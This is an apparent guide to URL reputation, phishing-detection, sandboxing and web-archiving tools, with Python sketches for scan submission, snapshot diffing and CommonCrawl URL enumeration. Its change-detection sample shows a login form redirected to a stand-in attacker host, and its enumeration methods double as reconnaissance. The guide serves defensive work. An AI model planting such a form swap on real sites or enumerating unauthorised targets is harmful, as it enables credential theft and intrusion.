URL scanning and reputation tools form a critical layer of defense in security research, threat investigation, and incident response. When a suspicious link appears in a phishing email, a malware sample, or a threat intelligence feed, URL analysis tools can safely detonate it in a sandbox, check it against threat databases, reveal its hosting infrastructure, and expose the content it serves — all without risking infection of a production machine. Beyond malware detection, these tools support web archiving (recovering deleted or changed content), phishing detection (identifying fraudulent lookalike pages), backlink analysis (mapping domain relationships), and URL enumeration (discovering all URLs associated with a target domain).

PhoneBook

Lists all domains, email addresses, or URLs for the given input domain — excellent for URL enumeration.

IntelligenceX

Search engine and data archive — indexes URLs across historical and leaked datasets.

URLScan

A sandbox for the web — submit any URL to scan and analyze its behavior, resources, and redirects.

HackerTarget

Collect information about IP Addresses, Networks, Web Pages and DNS records.

MOZ Link Explorer

Backlink checker that advertises an index of over 40 trillion links; useful for mapping domain link relationships.

shorteners.grayhatwarfare.com

Search URLs exposed by Shortener services — unshorten and investigate obfuscated links.

CommonCrawl Index

Open repository of web crawl data — query the index to find all crawled URLs for a domain.

URLVoid

Check the online reputation/safety of a website against multiple threat databases.

Norton SafeWeb

Look up a site and get Norton’s web safety and reputation rating.

CheckPhish

Real-time URL and website scanner — specializes in phishing page detection.

web-check.xyz

All-in-one OSINT tool for quickly checking a website’s data — headers, DNS, certs, and more.

TinyScan

Effortlessly Dive into URL Details — scan and analyze URLs for metadata and content.

urldna.io

Unleash website insights — analyzes data, monitors brands and exposes security risks.

URL Reputation, Phishing Detection & Web Archiving

URL Reputation Checking

Reputation tools such as URLVoid cross-reference a URL against dozens of blocklists and anti-phishing databases at once, while vendor services such as Norton SafeWeb report their own safety rating. Checking several sources reduces false negatives, because a URL may be clean on one feed but flagged as phishing on another. During incident response, a reputation check is one of the first steps when investigating a suspicious link from a phishing campaign, a malware C2 beacon, or a user-reported email.
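
The value of consulting several sources can be illustrated with a small aggregation step. This is a minimal sketch: the feed names and verdict labels are hypothetical placeholders, not the output format of URLVoid, Norton SafeWeb, or any other service. It only shows that a single flag from any one source is enough to escalate a URL.

```python
from collections import Counter

# Labels treated as malicious. These are assumptions made for this sketch,
# not any vendor's schema.
MALICIOUS_LABELS = {"phishing", "malware"}


def aggregate_verdicts(verdicts: dict[str, str]) -> dict:
    """Combine per-feed verdicts for one URL into a single summary.

    `verdicts` maps a (hypothetical) feed name to that feed's label.
    """
    flagged_by = sorted(
        name for name, label in verdicts.items() if label in MALICIOUS_LABELS
    )
    return {
        # One hit on any feed is enough to treat the URL as suspicious.
        "flagged": bool(flagged_by),
        "flagged_by": flagged_by,
        "detection_ratio": f"{len(flagged_by)}/{len(verdicts)}",
        "labels": dict(Counter(verdicts.values())),
    }


if __name__ == "__main__":
    sample = {"feed_a": "clean", "feed_b": "phishing", "feed_c": "clean"}
    print(aggregate_verdicts(sample))
```

Keeping the list of flagging feeds, rather than only a boolean, lets an analyst judge how much weight a single detection deserves.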

Phishing Detection & Analysis

Phishing pages are increasingly sophisticated — they use valid TLS certificates, mimic legitimate login pages, and often evade simple URL blocklists by using URL shorteners, redirectors, or compromised legitimate domains. Tools like CheckPhish use visual similarity analysis and content-based heuristics to detect phishing pages that reputation databases haven’t yet catalogued. URLScan goes further by rendering the page in a headless browser, capturing screenshots, recording all network requests, and logging the full DOM — giving analysts a complete picture of what a suspicious URL does when visited.
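
Submitting a URL to a scanning sandbox is usually a single authenticated HTTP request. The sketch below builds such a request for urlscan.io's scan endpoint using only the standard library. The endpoint path, the API-Key header, and the url and visibility fields reflect the public API as understood at the time of writing and should be checked against the current documentation. The function names and the sample key are assumptions made for illustration.

```python
import json
import urllib.request

# Assumed endpoint; verify against the service's current API documentation.
SCAN_ENDPOINT = "https://urlscan.io/api/v1/scan/"


def build_scan_request(
    target_url: str, api_key: str, visibility: str = "unlisted"
) -> urllib.request.Request:
    """Build (but do not send) a scan submission request."""
    payload = json.dumps({"url": target_url, "visibility": visibility})
    return urllib.request.Request(
        SCAN_ENDPOINT,
        data=payload.encode("utf-8"),
        headers={"API-Key": api_key, "Content-Type": "application/json"},
        method="POST",
    )


def submit_scan(target_url: str, api_key: str) -> dict:
    """Send the request and return the parsed JSON response."""
    request = build_scan_request(target_url, api_key)
    with urllib.request.urlopen(request, timeout=30) as response:
        return json.load(response)


if __name__ == "__main__":
    # Nothing is sent here; the request is only constructed and inspected.
    req = build_scan_request("http://example.test/login", "YOUR-API-KEY")
    print(req.get_method(), req.full_url)
    print(req.data.decode("utf-8"))
```

Separating request construction from sending makes the submission easy to review and test without touching the network. The default of "unlisted" is a choice made for this sketch, so that URLs under investigation are not published by accident.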

Web Archiving in Security Research

Web archiving tools serve several distinct purposes in security investigations:
  • Evidence preservation: archiving a phishing page or defaced website before it goes offline
  • Historical analysis: understanding what a domain served before it was weaponized
  • Deleted content recovery: retrieving pages that an organization or attacker has removed
  • Change detection: comparing current and historical content to identify when a compromise or modification occurred
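
Change detection, the last item above, can be sketched with the standard library alone: hash both versions for a quick yes/no answer, then produce a line diff to see what changed. The snapshot strings are invented sample data, and how the archived copy is obtained is left out of this sketch.

```python
import difflib
import hashlib


def content_changed(archived: str, current: str) -> bool:
    """Cheap check: compare SHA-256 digests of the two versions."""
    old_digest = hashlib.sha256(archived.encode("utf-8")).hexdigest()
    new_digest = hashlib.sha256(current.encode("utf-8")).hexdigest()
    return old_digest != new_digest


def snapshot_diff(archived: str, current: str) -> list[str]:
    """Return a unified diff between the archived and current content."""
    return list(
        difflib.unified_diff(
            archived.splitlines(),
            current.splitlines(),
            fromfile="archived",
            tofile="current",
            lineterm="",
        )
    )


if __name__ == "__main__":
    # Invented sample data: a login form whose target has been swapped.
    old = "<h1>Login</h1>\n<form action='/auth'>"
    new = "<h1>Login</h1>\n<form action='http://evil.test/collect'>"
    if content_changed(old, new):
        print("\n".join(snapshot_diff(old, new)))
```
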
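The CommonCrawl Index is particularly valuable for URL enumeration. By querying *.example.com against a crawl's index, researchers can retrieve the URLs that the Common Crawl bot captured for a domain and its subdomains in that crawl, often revealing endpoints, API paths, and pages not linked from the main site. Each crawl has its own index, so broad historical coverage means repeating the query across several crawls.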
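
A wildcard query of this kind can be sketched as follows. The code builds the query URL for one crawl and extracts unique URLs from the newline-delimited JSON that the index server returns. The crawl identifier CC-MAIN-2024-10 is only an example; the available crawls are listed in the collinfo.json file published on index.commoncrawl.org. The function names are assumptions made for illustration, and the sample response is invented data shaped like index records.

```python
import json
from urllib.parse import urlencode

INDEX_HOST = "https://index.commoncrawl.org"


def build_index_query(crawl_id: str, domain: str) -> str:
    """Build a wildcard query URL against one crawl's index."""
    params = urlencode({"url": f"*.{domain}", "output": "json"})
    return f"{INDEX_HOST}/{crawl_id}-index?{params}"


def parse_index_lines(body: str) -> list[str]:
    """Extract unique URLs from a newline-delimited JSON response."""
    urls = set()
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        record = json.loads(line)  # one JSON object per line
        urls.add(record["url"])
    return sorted(urls)


if __name__ == "__main__":
    print(build_index_query("CC-MAIN-2024-10", "example.com"))
    # Invented sample response for demonstration only.
    sample = (
        '{"url": "https://api.example.com/v1/users", "status": "200"}\n'
        '{"url": "https://example.com/", "status": "200"}\n'
        '{"url": "https://example.com/", "status": "301"}\n'
    )
    print(parse_index_lines(sample))
```

Fetching the query URL with any HTTP client and passing the response text to parse_index_lines yields the URL list for that crawl. Repeating this over several crawl identifiers and merging the results gives wider historical coverage.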
